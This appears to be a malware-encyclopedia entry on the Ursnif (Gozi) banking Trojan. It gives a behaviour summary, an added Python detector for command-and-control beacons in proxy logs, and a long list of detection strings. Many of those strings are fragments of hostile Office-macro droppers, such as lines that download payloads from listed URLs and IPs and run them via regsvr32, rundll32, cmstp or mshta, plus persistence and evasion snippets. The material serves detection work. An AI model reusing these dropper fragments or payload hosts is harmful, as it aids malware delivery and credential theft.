Signature match: Trojan (appears legitimate but performs malicious actions), platform: 32-bit Windows, family: Ursnif
Trojan:Win32/Ursnif!rfn is a detection for the Ursnif (Gozi) banking Trojan, an information stealer used for financial fraud. The strings below cover both the payload and the Office-macro droppers that deliver it. The payload persists through the HKCU Software\Microsoft\Windows\CurrentVersion\Run key (and its StartupApproved\Run companion), targets firefox.exe, chrome.exe, opera.exe and safari.exe to steal credentials and session data, stages collected data with makecab.exe, removes its own dropper with a cmd.exe "type %s1 > %s & del %s1" sequence, and beacons to command-and-control servers over HTTP using fixed query-string formats (for example data.php?version=...&user=...&server=...&id=...&type=...&name=...), with .onion references indicating that Tor hidden services may be used. The KeServiceDescriptorTable reference points to kernel-level (SSDT) tampering in some variants. The macro strings show droppers that fetch a payload over HTTP/HTTPS, drop it into C:\users\public, C:\ProgramData or %TEMP% under a misleading extension (.cpl, .gz, .jpg, .png, .tmp, .hta, .inf), and run it through regsvr32, rundll32, cmstp, mshta or a schtasks-created minute-interval task.
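The beacon formats and C2 hosts in the string list are enough to write a proxy-log check. The following is an added example, not code from the page or from Microsoft: the request paths, the two printf-style query formats and the two C2 domains come from the strings below; the log layout, the client addresses and the traffic itself are constructed, and pairing the user_id format with the /updt path is an assumption.

```python
"""Flag Ursnif-style C2 beacons in web-proxy log lines.

Added example, not code from the page or from Microsoft; the URI shapes and
hosts come from the signature strings on this page, the log format and the
traffic are constructed.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qs, urlsplit

# C2 hosts and request paths named in the signature strings.
KNOWN_C2_HOSTS = {"necessaryprote.co.cc", "legislationname.co.cc"}
BEACON_PATHS = ("/config.php", "/data.php", "/task.php", "/updt", "/options.cgi", "/script")

# Two printf-style beacon formats from the strings:
#   data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
#   user_id=%.4u&version_id=%lu&socks=%lu&build=%lu&crc=%.8x
DATA_PHP_KEYS = {"version", "user", "server", "id", "type", "name"}
DATA_PHP_NUMERIC = ("version", "server", "id", "type")
USER_ID_KEYS = {"user_id", "version_id", "socks", "build", "crc"}
USER_ID_NUMERIC = ("user_id", "version_id", "socks", "build")
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")   # %08x repeated four times
HEX8 = re.compile(r"^[0-9a-fA-F]{8}$")     # %.8x


def classify_url(url: str) -> list[str]:
    """Return the indicators a URL matches; an empty list means it is not flagged."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    qs = {k: v[0] for k, v in parse_qs(parts.query).items()}
    strong: list[str] = []
    weak: list[str] = []

    if host.endswith(".onion"):
        strong.append("onion host")
    if host in KNOWN_C2_HOSTS:
        strong.append("known C2 host")
    if (DATA_PHP_KEYS.issubset(qs) and HEX32.match(qs["user"])
            and all(qs[k].isdigit() for k in DATA_PHP_NUMERIC)):
        strong.append("data.php beacon format")
    if (USER_ID_KEYS.issubset(qs) and HEX8.match(qs["crc"])
            and all(qs[k].isdigit() for k in USER_ID_NUMERIC)):
        strong.append("user_id beacon format")
    if parts.path.lower().endswith(BEACON_PATHS):
        weak.append("beacon path " + parts.path)

    # /config.php or /data.php alone is far too common to alert on; the path is
    # reported only as supporting context next to a strong indicator.
    return strong + weak if strong else []


def scan_log(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Scan '<epoch> <client-ip> <method> <url>' lines and return one tuple per hit."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        client, url = fields[1], fields[3]
        hits = classify_url(url)
        if hits:
            findings.append((client, url, hits))
    return findings


# Constructed sample traffic in a squid-style layout; the hosts on the first two
# lines are the C2 domains from the string list, the rest use reserved example
# names. Carrying the user_id format on /updt is an assumption.
SAMPLE_LOG = """\
1712000000.123 10.0.0.5 GET http://legislationname.co.cc/data.php?version=217001&user=0123456789abcdef0123456789abcdef&server=12&id=1001&type=1&name=WIN7-PC
1712000001.456 10.0.0.5 POST http://necessaryprote.co.cc/config.php
1712000002.789 10.0.0.6 GET http://example.org/data.php?version=3
1712000003.000 10.0.0.7 GET http://abcdefghijklmnop.onion/task.php
1712000004.000 10.0.0.8 GET http://cdn.example.com/updt?user_id=0042&version_id=217001&socks=0&build=250&crc=deadbeef
1712000005.000 10.0.0.9 GET http://intranet.example.com/status.php?version=2
"""

if __name__ == "__main__":
    for client, url, hits in scan_log(SAMPLE_LOG):
        print(f"{client}  {', '.join(hits)}\n    {url}")
```

Run it as a script to see the four flagged requests; the two lines that only share a generic path (/data.php with a lone version parameter, /status.php) stay silent because the path is treated as corroboration, not as an indicator on its own. Feed real proxy exports through `scan_log` after mapping their columns to the same four fields.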
Relevant strings associated with this threat:
- .onion/ (PEHSTR)
- \\.\mailslot\msl0 (PEHSTR_EXT)
- hide_evr2.pdb (PEHSTR_EXT)
- \ESl8x (SNID)
- options.cgi (PEHSTR_EXT)
- \hide_evr2.pdb (PEHSTR_EXT)
- /updt (PEHSTR_EXT)
- cmd /U /C "type %s1 > %s & del %s1" (PEHSTR_EXT)
- KeServiceDescriptorTable (PEHSTR_EXT)
- /fp %lu (PEHSTR_EXT)
- DL_EXE (PEHSTR_EXT)
- DL_EXE_ST (PEHSTR_EXT)
- Software\Microsoft\InetData (PEHSTR_EXT)
- \*.exe (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- /config.php (PEHSTR_EXT)
- /data.php?version= (PEHSTR_EXT)
- /task.php (PEHSTR_EXT)
- firefox.exe (PEHSTR_EXT)
- chrome.exe (PEHSTR_EXT)
- opera.exe (PEHSTR_EXT)
- safari.exe (PEHSTR_EXT)
- necessaryprote.co.cc (PEHSTR_EXT)
- legislationname.co.cc (PEHSTR_EXT)
- 9HTTPt (PEHSTR_EXT)
- user_id=%.4u&version_id=%lu&socks=%lu&build=%lu&crc=%.8x (PEHSTR_EXT)
- /sd %lu (PEHSTR_EXT)
- makecab.exe /F "%s" (PEHSTR_EXT)
- data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s (PEHSTR_EXT)
- /upd %lu (PEHSTR_EXT)
- /U /C "type %s1 > %s & del %s1 (PEHSTR_EXT)
- =HTTPt (PEHSTR_EXT)
- HTTPt (PEHSTR_EXT)
- dl_exe (PEHSTR_EXT)
- dl_exe_st (PEHSTR_EXT)
- SCREENSHOT (PEHSTR_EXT)
- /it %lu /ge %s /gp %s (PEHSTR_EXT)
- .rdau (PEHSTR_EXT)
- https:// (PEHSTR_EXT)
- \\.\%s (PEHSTR_EXT)
- USER.ID (PEHSTR_EXT)
- \*.dll (PEHSTR_EXT)
- StartupApproved\Run (PEHSTR_EXT)
- /pki/mscorp/crl/MSIT (PEHSTR_EXT)
- /script?u= (PEHSTR_EXT)
- /C "copy "%s" "%s" /y && "%s"" (PEHSTR_EXT)
- godmmw/ph") (MACROHSTR_EXT)
- A-Za-z.(" (MACROHSTR_EXT)
- A-Za-z. (MACROHSTR_EXT)
- M(k.'- (SNID)
- dbg.txt (PEHSTR_EXT)
- dll.bin (PEHSTR_EXT)
- 544k0//OPLKRngf (PEHSTR)
- 8(''E/--(NIG.NIG.NIG.NIH.NIH.NIH.NIH.<99,''')///K:99T### (PEHSTR)
- c:\sat\Section\stood\country\strong\segment\Fell\mostchild.pdb (PEHSTR_EXT)
- if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[Prc_QueryLoadTestRequestSummary]') and OBJECTPROPERTY(id, N'IsProcedure') = 1) (PEHSTR_EXT)
- 4`_\= (SNID)
- LA*./ (SNID)
- ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb (PEHSTR)
- CMD.EXE (PEHSTR_EXT)
- Touched A Neighbour %d with %d. Resuming a thread with ID: %d (PEHSTR_EXT)
- !This -7Afram cannot be run in DOS mode. (PEHSTR_EXT)
- X:\hemiterata\confervaceous\spireward\wordsmith.pdb (PEHSTR_EXT)
- = "cmd.exe /c P^" + Chr( (MACROHSTR_EXT)
- )) + "^e^L^L^.^e^x^e^ ^-^E^C^ (MACROHSTR_EXT)
- c:\Capital\Desert\Let\fell\Cool\Soil\ThirdThin.pdb (PEHSTR_EXT)
- Determine\Opposite\settle\Beforedouble.pdb (PEHSTR_EXT)
- \Lowu (PEHSTR_EXT)
- .exe (PEHSTR)
- \\3\.41\.34DLOperatingSyk3456bb (PEHSTR_EXT)
- Towardyear\Shouldon\sureSummer\Createsingle\allowtoBy.pdb (PEHSTR_EXT)
- Studyobserve.pdb (PEHSTR_EXT)
- \GWHWERW.pdb (PEHSTR_EXT)
- .\mailslot\sl%x (PEHSTR_EXT)
- c:\smile\Section\Are\which\book\salt\range\Subject\objecthigh.pdb (PEHSTR_EXT)
- mixseat.exe (PEHSTR_EXT)
- protocol\StdFileEditing\server (PEHSTR_EXT)
- \\3\.41\.34DLOperatingSyk3456bb (PEHSTR)
- c:\Every\black\Suggest\Once\Soundiron.pdb (PEHSTR_EXT)
- \finger\thusWear.pdb (PEHSTR_EXT)
- c:\divide\broad\Hole\DoThird.pdb (PEHSTR_EXT)
- c:\Yard\Ball\Pair\difficulthas.pdb (PEHSTR_EXT)
- PerhapsDance.pdb (PEHSTR_EXT)
- .CreateTextFile( (MACROHSTR_EXT)
- () & "\ (MACROHSTR_EXT)
- .xs" & (MACROHSTR_EXT)
- .x" + (MACROHSTR_EXT)
- .xsl" (MACROHSTR_EXT)
- .Controls(1).Value, True) (MACROHSTR_EXT)
- .Controls(0) (MACROHSTR_EXT)
- .Controls(0 + 1) (MACROHSTR_EXT)
- .Open (MACROHSTR_EXT)
- .Close (MACROHSTR_EXT)
- .Value (MACROHSTR_EXT)
- " & StrReverse("lsx.") (MACROHSTR_EXT)
- .Controls(1).Value (MACROHSTR_EXT)
- .WriteLine (MACROHSTR_EXT)
- = CreateObject("Scripting.FileSystemObject") (MACROHSTR_EXT)
- .Controls(1).Text (MACROHSTR_EXT)
- .Controls(vbHide) (MACROHSTR_EXT)
- .Text (MACROHSTR_EXT)
- ActiveDocument.Range.PageSetup.LeftMargin = (MACROHSTR_EXT)
- + ".applica" + "tion" (MACROHSTR_EXT)
- = "exe" (MACROHSTR_EXT)
- .s1.Value & (MACROHSTR_EXT)
- .s2.Text (MACROHSTR_EXT)
- ." & (MACROHSTR_EXT)
- .run (MACROHSTR_EXT)
- 0.xsl", 1) (MACROHSTR_EXT)
- VBA.Interaction.Shell (MACROHSTR_EXT)
- = "bin.base64" (MACROHSTR_EXT)
- .value (MACROHSTR_EXT)
- .Controls(2 - 1 - 1) (MACROHSTR_EXT)
- P.Text (MACROHSTR_EXT)
- .Controls(Len("a")).Value (MACROHSTR_EXT)
- ("winmgmts:root\cimv2:Win32_Process") (MACROHSTR_EXT)
- "bin.base64" (MACROHSTR_EXT)
- T$,f9\$ (PEHSTR_EXT)
- .xsl", 1) (MACROHSTR_EXT)
- Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" (MACROHSTR_EXT)
- .Controls(Len(" (MACROHSTR_EXT)
- ")).Value (MACROHSTR_EXT)
- = Chr(230 - (30 / 2) - (50 * 2)) + "HELL." (MACROHSTR_EXT)
- .Controls( (MACROHSTR_EXT)
- H).Value (MACROHSTR_EXT)
- bac.9kon=l?php.p23i0oia/58ol02ew/moc.8fjjfbb//:ptth", (MACROHSTR_EXT)
- ("tmp") & "\ (MACROHSTR_EXT)
- .tmp" (MACROHSTR_EXT)
- = Chr(115 + 0) + "HELL." (MACROHSTR_EXT)
- U).Text (MACROHSTR_EXT)
- , "\", "\\") (MACROHSTR_EXT)
- .Write (MACROHSTR_EXT)
- dIe.y-KZX-Lujpm-Kw.pdb (PEHSTR)
- U).Value (MACROHSTR_EXT)
- & "p" & "\" & "\ (MACROHSTR_EXT)
- Call Interaction.Shell@( (MACROHSTR_EXT)
- ActiveDocument.ActiveWindow.Panes(1).Pages.Count (MACROHSTR_EXT)
- = StrReverse("\\\\pmet\\\\swodniw\\\\:c") (MACROHSTR_EXT)
- .inf", (MACROHSTR_EXT)
- .sct", (MACROHSTR_EXT)
- StrReverse(" s/ in/ ptsmc") & (MACROHSTR_EXT)
- .inf" (MACROHSTR_EXT)
- .Controls (MACROHSTR_EXT)
- .createElement("b64") (MACROHSTR_EXT)
- Call Interaction$.Shell@(StrReverse( (MACROHSTR_EXT)
- & "emp" & "\ (MACROHSTR_EXT)
- .xsl" For Output As # (MACROHSTR_EXT)
- Call VBA.Shell@(StrReverse( (MACROHSTR_EXT)
- Call VBA.Interaction.Shell@(StrReverse( (MACROHSTR_EXT)
- Debug.Print Error (MACROHSTR_EXT)
- .run StrReverse( (MACROHSTR_EXT)
- .xs" + (MACROHSTR_EXT)
- As String = "c:\windows" (MACROHSTR_EXT)
- As String = "\t" (MACROHSTR_EXT)
- Call VBA.Shell@(StrReverse (MACROHSTR_EXT)
- .x.value & (MACROHSTR_EXT)
- .y.value (MACROHSTR_EXT)
- = "aubex.x" + (MACROHSTR_EXT)
- Debug.Print Error( (MACROHSTR_EXT)
- .exec(StrReverse( (MACROHSTR_EXT)
- ("46esab.nib") (MACROHSTR_EXT)
- temp\ (MACROHSTR_EXT)
- VBA.Interaction (MACROHSTR_EXT)
- .Shell@ (MACROHSTR_EXT)
- .exec( (MACROHSTR_EXT)
- shell.Run("schtasks.exe /Create /F /TN \" (PEHSTR_EXT)
- \" /TR \"" + command + "\" /SC Minute /MO (PEHSTR_EXT)
- XObject('WScript.Shell'); eval( (PEHSTR_EXT)
- .RegRead('HKEY_CURRENT_USER\\\\Software\\\\ApplicationContainer\\\\Appsw64\\\\ServerUrl (PEHSTR_EXT)
- = "lsx." (MACROHSTR_EXT)
- ) & "\ (MACROHSTR_EXT)
- .Item().Document.Application.ShellExecute (MACROHSTR_EXT)
- = Me.InlineShapes( (MACROHSTR_EXT)
- ).AlternativeText & Me.InlineShapes( (MACROHSTR_EXT)
- ).AlternativeText (MACROHSTR_EXT)
- + ThisDocument.Application.CentimetersToPoints (MACROHSTR_EXT)
- C:\ProgramData\ (MACROHSTR_EXT)
- = Shell("cmstp /ni /s C:\ProgramData\ (MACROHSTR_EXT)
- .inf") (MACROHSTR_EXT)
- H:\flow\reproductivity\act\scripts.pdb (PEHSTR_EXT)
- c:\They\by\Say\Drive\650-Break\Product.pdb (PEHSTR_EXT)
- SetSecurityDescriptorDacl (PEHSTR_EXT)
- brought\sign\fine\left\cent\believenight.pdb (PEHSTR_EXT)
- Microsoft.CRTProvider (PEHSTR_EXT)
- .Run StrReverse(" (MACROHSTR_EXT)
- .text.text) (MACROHSTR_EXT)
- ExecuteCommand "C:\DiskDrive\1\Volume\BackFiles\errorfix.bat (MACROHSTR_EXT)
- .php " & Environ("appdata") & (MACROHSTR_EXT)
- .exe (MACROHSTR_EXT)
- .exe" & UserForm3.RootOLE2.Caption (MACROHSTR_EXT)
- Me.InlineShapes( (MACROHSTR_EXT)
- .InlineShapes( (MACROHSTR_EXT)
- + ThisDocument.Application.InchesToPoints( (MACROHSTR_EXT)
- //:ptth", (MACROHSTR_EXT)
- .exec (MACROHSTR_EXT)
- C:\zKfsgSt\QPqYpbf\QzikFhm.exe (MACROHSTR_EXT)
- C:\kTTGsUq\DRyQCGf\aWLfVMa.exe (MACROHSTR_EXT)
- C:\HppcPqN\ZnVmYcD\wshCsiw.exe (MACROHSTR_EXT)
- C:\EnmaMnK\WkSjVZz\upeypgt.exe (MACROHSTR_EXT)
- C:\ihmJQXC\POehkcB\WqvEtZi.exe (MACROHSTR_EXT)
- C:\RpiepHV\qeoMHkl\eEPJbYv.exe (MACROHSTR_EXT)
- C:\yxDagnS\feuxBsR\mHMUKpy.exe (MACROHSTR_EXT)
- C:\pZkqmxP\dlmvUPr\MlMXRjT.exe (MACROHSTR_EXT)
- C:\VMakTSG\GhpCexd\iLpnWKe.exe (MACROHSTR_EXT)
- C:\LttgTtQ\drYqcgG\BwkGvmB.exe (MACROHSTR_EXT)
- C:\LQNYbqM\NWgbFUn\mkewtQm.exe (MACROHSTR_EXT)
- C:\pYYLxZv\IWEVHLl\fbQkaRf.exe (MACROHSTR_EXT)
- C:\YmiRfEF\foBdwbz\KCmUWrU.exe (MACROHSTR_EXT)
- rundll32.exe (MACROHSTR_EXT)
- ShellExecuteA (MACROHSTR_EXT)
- http://gstat.matthewsalemstolper.com/pagament1.exe (MACROHSTR_EXT)
- http://gstat.ausagistment.com/pagament1.exe (MACROHSTR_EXT)
- http://gstat.llbntv.com/pagament1.exe (MACROHSTR_EXT)
- http://gstat.llbntv.org/pagament1.exe (MACROHSTR_EXT)
- https://anr8.com.au/loxarchiveFALSEsign.php (MACROHSTR_EXT)
- https://yyauto.com.au/settings/boss.php (MACROHSTR_EXT)
- https://www.lovekolaches.com/docusign/sign.php (MACROHSTR_EXT)
- https://tlanddissipate.at/3/rbs.dll (MACROHSTR_EXT)
- http://149.28.33.80/documents.php (MACROHSTR_EXT)
- http://45.63.30.20/l1o2c3o4m5o6t7i8v.php (MACROHSTR_EXT)
- http://www.adrelatemedia.com/haidress/gmail.php (MACROHSTR_EXT)
- https://memberteam.works/templatesb/superthemen.php (MACROHSTR_EXT)
- http://149.28.33.80/ODZACUQ.exe (MACROHSTR_EXT)
- https://entspartner.at/3/rsk.dll (MACROHSTR_EXT)
- https://ogglededibl.at/3/dws.dll (MACROHSTR_EXT)
- https://destgrena.at/3/tsk.dll (MACROHSTR_EXT)
- https://sdeputizi.at/3/dok.dll (MACROHSTR_EXT)
- https://utenti.online/1.exe (MACROHSTR_EXT)
- https://szn.services/1.exe (MACROHSTR_EXT)
- https://nl.mjndomein.systems/1.exe (MACROHSTR_EXT)
- Call URLDownloadToFile(0, "http://d7uap.com/iz5/yaca.php?l=tze3.cab", JK, 0, 0) (MACROHSTR_EXT)
- "kE.tmp" (MACROHSTR_EXT)
- fX.run "regsvr32 " & JK (MACROHSTR_EXT)
- Call URLDownloadToFile(0, "http://9ygw2.com/iz5/yaca.php?l=kpt1.cab", Vw, 0, 0) (MACROHSTR_EXT)
- "U.tmp" (MACROHSTR_EXT)
- X.run "regs" + "vr32 " & Vw (MACROHSTR_EXT)
- ioyyf.com/iz5/yaca.php? (MACROHSTR_EXT)
- .cab" (MACROHSTR_EXT)
- URLDownloadToFile(0, "http:// (MACROHSTR_EXT)
- .setRequestHeader "etag", "fetch" (MACROHSTR_EXT)
- Ajj = w.GetSpecialFolder(0 + j) (MACROHSTR_EXT)
- Ajj = Ajj & "\" & Abs(Application.WindowState) & "." (MACROHSTR_EXT)
- a = a & Mid(k.Cells(1, 1), Len(k.Cells(1, j)) + 1, j) (MACROHSTR_EXT)
- https://onlinecompaniehouse.com/sorvD2. (MACROHSTR_EXT)
- https://onlinecompaniehouse.com/sorv.png (MACROHSTR_EXT)
- sorv.png (MACROHSTR_EXT)
- = "c:\programdata\RrKki.pdf" (MACROHSTR_EXT)
- ((3) & "." & (MACROHSTR_EXT)
- ((3) & "request.5.1") (MACROHSTR_EXT)
- .exec (YBxsP) (MACROHSTR_EXT)
- = "c:\programdata\hMDcJ.pdf" (MACROHSTR_EXT)
- .exec (KsVoJ) (MACROHSTR_EXT)
- 9c:\Barsend\WarStretch\PageMust\Bottominstrument\Group.pdb (PEHSTR)
- Group.dll (PEHSTR)
- GlobalClearDocument.Open "GET", "http://" & ListBox1.List(3), False (MACROHSTR_EXT)
- RightDocument.SaveToFile ("C:\users\public\ftr.cpl") (MACROHSTR_EXT)
- CreateObject(ListBox1.List(4)).Run (LinkNamespaceRef + "C:\users\public\ftr.cpl") (MACROHSTR_EXT)
- ListBox1.AddItem ("systemlive.casa/statis1c.dll") (MACROHSTR_EXT)
- ListBox1.AddItem ("regsvr32 ") (MACROHSTR_EXT)
- ListBox1.AddItem ("WScript.Shell") (MACROHSTR_EXT)
- Application.Run "Def" (MACROHSTR_EXT)
- ArrayListbox.Open "GET", "http://" & ListBox1.List(3), False (MACROHSTR_EXT)
- VbStorage.SaveToFile ("C:\users\public\wtt.gz") (MACROHSTR_EXT)
- CreateObject(ListBox1.List(4)).Run (OptionSwapDatabase + "C:\users\public\wtt.gz") (MACROHSTR_EXT)
- ListBox1.AddItem ("systemok.casa/statis1c.dll") (MACROHSTR_EXT)
- .Open "GET", "http://" & ListBox1.List(3), False (MACROHSTR_EXT)
- .SaveToFile ("C:\users\public\ (MACROHSTR_EXT)
- CreateObject(ListBox1.List(4)).Run ( (MACROHSTR_EXT)
- + "C:\users\public\ (MACROHSTR_EXT)
- ListBox1.AddItem (" (MACROHSTR_EXT)
- .casa/statis1c.dll") (MACROHSTR_EXT)
- UserForm1.CommandButton2_Click (MACROHSTR_EXT)
- 0.Send (MACROHSTR_EXT)
- CreateObject(ListBox1.List(4)).Run "" & ( (MACROHSTR_EXT)
- + "32 " & "C:\users\public\ (MACROHSTR_EXT)
- ListBox1.AddItem (CommandButton4.Tag) (MACROHSTR_EXT)
- ListBox1.AddItem (Image1.Tag) (MACROHSTR_EXT)
- /p1cture3.jpg") (MACROHSTR_EXT)
- ListBox1.AddItem (TextBox2.ControlTipText) (MACROHSTR_EXT)
- If Application.CheckSpelling(aWord.Text) Then (MACROHSTR_EXT)
- Worksheets("Sheet2").SaveAs Length & Jizz, Rez (MACROHSTR_EXT)
- Worksheets("Sheet1").SaveAs Length & Wizz, Rez (MACROHSTR_EXT)
- Wizz = ".xls" (MACROHSTR_EXT)
- Jizz = ".fo" (MACROHSTR_EXT)
- Private Sub CommandButton1_Click() (MACROHSTR_EXT)
- ListBox1.AddItem (Image1.ControlTipText) (MACROHSTR_EXT)
- ListBox1.AddItem (":// (MACROHSTR_EXT)
- 0.casa/footer.jpg") (MACROHSTR_EXT)
- InstrumentationUtil.PasteRemove = "C:\users\Public\" + " (MACROHSTR_EXT)
- .jpg" (MACROHSTR_EXT)
- InstrumentationUtil.LinkDelete = "http" (MACROHSTR_EXT)
- InstrumentationUtil.WindowProcedureArray = "GET" (MACROHSTR_EXT)
- InstrumentationUtil.LinkDelete & ListBox1.List(3), False (MACROHSTR_EXT)
- InstrumentationUtil. (MACROHSTR_EXT)
- = "C:\users\Public\" + " (MACROHSTR_EXT)
- = "http" (MACROHSTR_EXT)
- & ListBox1.List(3), False (MACROHSTR_EXT)
- 0.casa/login.jpg") (MACROHSTR_EXT)
- 0.cyou/login.jpg") (MACROHSTR_EXT)
- % = "C:\users\Public\" + " (MACROHSTR_EXT)
- .jpg") (MACROHSTR_EXT)
- = "C:\users\Public\" + "xfe.png" (MACROHSTR_EXT)
- & ListBox1.List(3) (MACROHSTR_EXT)
- ShellRunner.Run VarExQuery & RefArray (MACROHSTR_EXT)
- ListBox1.AddItem (CommandButton1.Tag) (MACROHSTR_EXT)
- ListBox1.AddItem (CheckBox1.Tag) (MACROHSTR_EXT)
- Set classList = classList.CreateTextFile(ptrPtr) (MACROHSTR_EXT)
- classList.WriteLine constArrayDocument (MACROHSTR_EXT)
- Public Sub CommandButton1_Click() (MACROHSTR_EXT)
- Set countIndex = CreateObject("w" & script & "shell") (MACROHSTR_EXT)
- countIndex.exec frm.CommandButton1.Tag & " c:\users\public\main.hta (MACROHSTR_EXT)
- windowCopy = "c:\users\public\main.hta" (MACROHSTR_EXT)
- removeLocal.mainClass windowCopy, repoQuery (MACROHSTR_EXT)
- Call frm.CommandButton1_Click (MACROHSTR_EXT)
- Set genericDataTextbox = CreateObject("System.Text.StringBuilder") (MACROHSTR_EXT)
- script = "script" & ". (MACROHSTR_EXT)
- genericDataTextbox.Append_3 " (MACROHSTR_EXT)
- {return queryGlobalCaption.split('').reverse().join(''); (MACROHSTR_EXT)
- classTableConst.Timeout = 60000 (MACROHSTR_EXT)
- .exec frm.CommandButton1.Tag & " c:\users\public\main.hta" (MACROHSTR_EXT)
- removeLocal.mainClass (MACROHSTR_EXT)
- = CreateObject("System.Text.StringBuilder") (MACROHSTR_EXT)
- split('').reverse().join(''); (MACROHSTR_EXT)
- script = "script" & "." (MACROHSTR_EXT)
- .Append_3 "<div id='content'>fTtl (MACROHSTR_EXT)
- CreateObject("wscript.shell").exec a (MACROHSTR_EXT)
- myfrm1.text1.text (MACROHSTR_EXT)
- .onion (PEHSTR_EXT)
- http://constitution.org/usdeclar.txt (PEHSTR_EXT)
- = "c:\users\public\main.hta" (MACROHSTR_EXT)
- namespaceEx.exec frm.CommandButton1.Tag & " c:\users\public\main.hta" (MACROHSTR_EXT)
- = CreateObject("w" & script & "shell") (MACROHSTR_EXT)
- buttonException.Append_3 (MACROHSTR_EXT)
- CreateObject("wscript.shell") (MACROHSTR_EXT)
- = ActiveDocument.BuiltInDocumentProperties("title") (MACROHSTR_EXT)
- frm.button1_Click (MACROHSTR_EXT)
- .exec tg (MACROHSTR_EXT)
- = Split(frm.tg, " ") (MACROHSTR_EXT)
- HKEY_CUR" & StrReverse("rawtfoS\RESU_TNER") & "e\Microsoft\Office\" (MACROHSTR_EXT)
- Word\Secur" & StrReverse("VsseccA\yti") & "BOM (MACROHSTR_EXT)
- .RegWrite (MACROHSTR_EXT)
- = StrReverse(UserForm1.TextBox1) (MACROHSTR_EXT)
- c:\lead\Ice\Press\Protect\Class\person.pdb (PEHSTR_EXT)
- c:\Grew_Practice\137\until\Poor_fair\Voice-Rock\class.pdb (PEHSTR_EXT)
- bENHWRJNRw@#GHNe.pdb (PEHSTR_EXT)
- Close\Eight\age\king\Organ\sea\music\Kinghill.pdb (PEHSTR_EXT)
- Bread mass Againbat human cause (PEHSTR_EXT)
- c:\life\Copy\spring\rain\Ever\mind\cent\burnCold.pdb (PEHSTR_EXT)
- admin@gremaonline.ru (PEHSTR_EXT)
- rewgqrwg.pdb (PEHSTR_EXT)
- fell\Test.pdb (PEHSTR_EXT)
- Test.dll (PEHSTR_EXT)
- Sw = 4: Sheets(1).Cells(17, 1).FormulaLocal = soPho & Rounts (MACROHSTR_EXT)
- Excel4MacroSheets.Add Before:=Worksheets(tol): emm (MACROHSTR_EXT)
- Sheets(1).[A5].FormulaLocal = qq (MACROHSTR_EXT)
- Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = Lowe: Fisolo (MACROHSTR_EXT)
- s = s: Sheets(1).[A5].FormulaLocal = ed (MACROHSTR_EXT)
- Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = anndy: Lamdaa (MACROHSTR_EXT)
- admin@dverifadotov.space (PEHSTR_EXT)
- Bud. 115 prospekt Gagarina (PEHSTR_EXT)
- ReDim L(0 To CLng((Aii(R) / S) - 1)) (MACROHSTR_EXT)
- u = R: Sheets(1).[F4].FormulaLocal = un (MACROHSTR_EXT)
- Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = Ecco_la: l_esperienza (MACROHSTR_EXT)
- d).Create GlemS("" & FinGo1), (MACROHSTR_EXT)
- Sheets(msoGradientHorizontal).Cells(37, 15).FormulaLocal = (MACROHSTR_EXT)
- Sheets(msoLineSingle).Cells(37, 9).FormulaLocal = HonN & forcer (MACROHSTR_EXT)
- Sheets(msoLineSingle).Cells(30 + 7, 3 * 3).FormulaLocal = VVoo & forcer (MACROHSTR_EXT)
- = f & CaPoo("" & p, p.Column) (MACROHSTR_EXT)
- little-shore\358\Level.pdb (PEHSTR_EXT)
- WinHttpOpenRequest (PEHSTR_EXT)
- WinHttpReadData (PEHSTR_EXT)
- WinHttpAddRequestHeaders (PEHSTR_EXT)
- turbos.dll (PEHSTR_EXT)
- ConvertStringSecurityDescriptorToSecurityDescriptorA (PEHSTR_EXT)
- ShellExecuteW (PEHSTR_EXT)
- d:\in\the\town\where\ahung.pdb (PEHSTR_EXT)
- malexgatheredNmoveth.manbeast2very (PEHSTR_EXT)
- GetObject(ppR).Get(IU) (MACROHSTR_EXT)
- MMaK.Open (MACROHSTR_EXT)
- out(nPJs(i), j) = Mid$(MillW, k, 1) (MACROHSTR_EXT)
- Gguida("aEX2MT.01MM.LT6OGSLXHP.") (MACROHSTR_EXT)
- Traduce(Gguida("Qhp/onco_Jts/ma.m>\t:daic"), m) (MACROHSTR_EXT)
- zmfifthtsaying,KCattlebeastmoved.B (PEHSTR_EXT)
- = Environ("Temp") & "\" & ty & "." (MACROHSTR_EXT)
- = Bn: Application.Quit (MACROHSTR_EXT)
- Call MR.SetTimeouts(0, 2000, 2000, 5000) (MACROHSTR_EXT)
- MR.Open "GET", DecodeSTR(" (MACROHSTR_EXT)
- .setRequestHeader "Cache-Control", "no-cache" (MACROHSTR_EXT)
- .setRequestHeader "Pragma", "no-cache" (MACROHSTR_EXT)
- .send (MACROHSTR_EXT)
- .WaitForResponse (MACROHSTR_EXT)
- bbb = .ResponseText (MACROHSTR_EXT)
- Application.Quit (wdDoNotSaveChanges) (MACROHSTR_EXT)
- Set daraufh = headb.CreateTextFile("C:\ProgramData\graniteb.txt") (MACROHSTR_EXT)
- Set showsp = believesp.execquery("select * from antivirusproduct", "wql", 0) (MACROHSTR_EXT)
- daraufh.Write "function eBooksj($detectivef){$platformi = [Net.WebRequest]::Create('https://TheFinanceInvest.com/'+$detectivef);$platformi.Method='GET'; (MACROHSTR_EXT)
- impartiale = "C:\ProgramData\prncnfg.txt" (MACROHSTR_EXT)
- CreateObject("Shell.Application").ShellExecute "cscript.exe", "C:\windows\System32\Printing_Admin_Scripts\en-US\prnport.v" (MACROHSTR_EXT)
- ,destination:=activesheet.range("$a$2")). (MACROHSTR_EXT)
- =hubb&""&pareggiato&",#1/q"shellpresiedereendfunctionfunctionhermu() (MACROHSTR_EXT)
- "Scripting.": xDww = xDww & "FileSystemObject" (MACROHSTR_EXT)
- bt.GetSpecialFolder(0 + Tiuuti) & "\" & GG & "." (MACROHSTR_EXT)
- = DSw.th32ProcessID (MACROHSTR_EXT)
- Workbooks.Application.DisplayAlerts = Bn: Application.Quit (MACROHSTR_EXT)
